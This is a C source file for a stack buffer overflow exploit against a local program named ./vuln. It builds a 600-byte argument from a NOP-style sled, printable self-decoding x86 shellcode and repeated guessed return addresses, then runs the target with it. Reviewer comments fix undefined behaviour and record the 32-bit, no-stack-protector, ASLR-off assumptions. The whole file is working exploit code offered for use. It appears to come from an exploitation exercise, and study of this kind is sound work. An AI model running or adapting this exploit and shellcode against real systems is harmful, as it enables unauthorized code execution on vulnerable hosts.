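/*
 * Launcher for a classic stack-based buffer overflow against ./vuln.
 *
 * Builds a 600-byte argument consisting of a 200-byte sled of printable
 * single-byte instructions ('@'), the printable shellcode, and a tail of
 * repeated guessed return addresses, then exec()s ./vuln with that buffer
 * as argv[1].  The return-address guess is the launcher's own stack pointer
 * minus an offset given on the command line (default 0).
 *
 * NOTE(review): everything here is 32-bit x86 specific (the %esp read, the
 * 4-byte return-address words, the x86 shellcode).  It is only useful against
 * a target built without a stack protector, with an executable stack and
 * with ASLR disabled -- none of that is checked here, it is simply assumed.
 *
 * The header names had been stripped from the original "#include" line
 * (presumably by markup removal); the set below is what the code actually
 * uses.
 */
#include <errno.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * Printable (ASCII-only) x86 shellcode.  The leading "%JONE%501:", "TX",
 * "-...." and "P" / "\" bytes look like the usual and/push/pop/sub
 * self-decoding prologue of printable shellcode, but the decoded payload is
 * not visible in this file -- treat the string as opaque.  Do not edit it:
 * the sub-immediates are tied to the exact byte sequence.
 */
char shellcode[] = "%JONE%501:TX-3399-Purr-!TTTP\\%JONE%501:-tKK4-gXn%-uPy%P-8Jxn-%8sxP-dddd-777j-JdbyP-Uu%U-pp6A-At%RP-wwww-OO33-s9DVP-r%O%-wDee-yDmuP-CCCC-%0w%-42e6P-H8z8-Y8q8P-jj4j-d9L%-2658PPPPPPPPPPPPPPPP";

enum {
    BUF_SIZE = 600,  /* size of the argument handed to ./vuln            */
    NOP_LEN  = 200,  /* length of the sled placed in front of the shellcode */
    WORD     = 4     /* width of a 32-bit x86 return address              */
};

/*
 * Return the current 32-bit stack pointer.
 *
 * The value is taken through an explicit output operand and returned
 * normally; the original left it in %eax and fell off the end of a
 * non-void function, which is undefined behaviour even though it happens
 * to work.  On an x86-64 host this yields the low 32 bits of %rsp, exactly
 * what the original "movl %esp, %eax" produced.
 */
unsigned long sp(void)
{
    unsigned int esp_lo;
    __asm__("movl %%esp, %0" : "=r"(esp_lo));
    return esp_lo;
}

/*
 * Entry point.
 *
 * argv[1] (optional): decimal offset subtracted from the launcher's stack
 * pointer to form the guessed return address.  Invalid or out-of-range
 * offsets are rejected instead of silently becoming 0 via atoi().
 *
 * Returns only on failure (bad offset, allocation failure, or a failed
 * exec); on success ./vuln replaces this process.
 */
int main(int argc, char *argv[])
{
    const char *prog = (argc > 0 && argv[0] != NULL) ? argv[0] : "exploit";
    int offset = 0;

    if (argc < 2) {
        /* NOTE(review): the usage text looks like it lost an "<offset>"
         * placeholder to markup stripping; confirm against the original
         * before changing the string. */
        printf("Use %s \nUsing default offset of 0\n", prog);
    } else {
        char *end = NULL;
        errno = 0;
        long v = strtol(argv[1], &end, 10);
        if (end == argv[1] || *end != '\0' || errno == ERANGE ||
            v < INT_MIN || v > INT_MAX) {
            fprintf(stderr, "%s: invalid offset '%s'\n", prog, argv[1]);
            return EXIT_FAILURE;
        }
        offset = (int)v;
    }

    /* Guess: the overwritten return address should land somewhere in our
     * sled, which sits at roughly the same stack depth in ./vuln. */
    long esp = (long)sp();
    long ret = esp - offset;

    /* The label "EIP" is kept from the original; the value is actually
     * the launcher's stack pointer (see sp() above). */
    printf("Stack pointer (EIP) : 0x%lx\n", esp);
    printf("   Offset from EIP : 0x%x\n", offset);
    printf("Desired Return Addr : 0x%lx\n", ret);

    char *buffer = malloc(BUF_SIZE);
    if (buffer == NULL) {
        perror("malloc");
        return EXIT_FAILURE;
    }

    /* Fill the whole buffer with the guessed return address, one 4-byte
     * word at a time.  Copying a uint32_t (rather than storing through a
     * long *) keeps the writes 4 bytes wide on LP64 hosts, where a long is
     * 8 bytes and the original loop wrote 600 bytes past the allocation. */
    uint32_t ret_word = (uint32_t)ret;
    for (size_t i = 0; i + WORD <= BUF_SIZE; i += WORD) {
        memcpy(buffer + i, &ret_word, WORD);
    }

    /* A zero byte inside the address would terminate the argv string early
     * and cut off the tail of return addresses; warn rather than abort. */
    for (int b = 0; b < WORD; b++) {
        if (((const unsigned char *)&ret_word)[b] == 0) {
            fprintf(stderr,
                    "warning: return address 0x%lx contains a zero byte; "
                    "the argument will be truncated there\n", ret);
            break;
        }
    }

    /* Sled: '@' is a printable single-byte instruction on x86, so execution
     * landing anywhere in it slides into the shellcode. */
    memset(buffer, '@', NOP_LEN);

    /* Shellcode goes one byte before the end of the sled (offset 199),
     * exactly as in the original.  The reason for the -1 is not visible
     * here (presumably how the decoder expects to line up with the
     * return-address tail) -- TODO confirm before moving it. */
    size_t sc_len = sizeof shellcode - 1;   /* drop the terminating NUL */
    size_t sc_off = NOP_LEN - 1;
    if (sc_off + sc_len > (size_t)BUF_SIZE - 1) {
        fprintf(stderr, "%s: shellcode does not fit in the buffer\n", prog);
        free(buffer);
        return EXIT_FAILURE;
    }
    memcpy(buffer + sc_off, shellcode, sc_len);

    /* Terminate the string so it can be passed as an argv element. */
    buffer[BUF_SIZE - 1] = '\0';

    /* Hand the crafted buffer to ./vuln as its first argument.  The argv
     * list terminator must be a null *pointer*: a bare 0 is an int and is
     * not guaranteed to be read back as a full-width NULL by execl(). */
    execl("./vuln", "vuln", buffer, (char *)NULL);

    /* execl() only returns on failure. */
    perror("execl ./vuln");
    free(buffer);
    return EXIT_FAILURE;
}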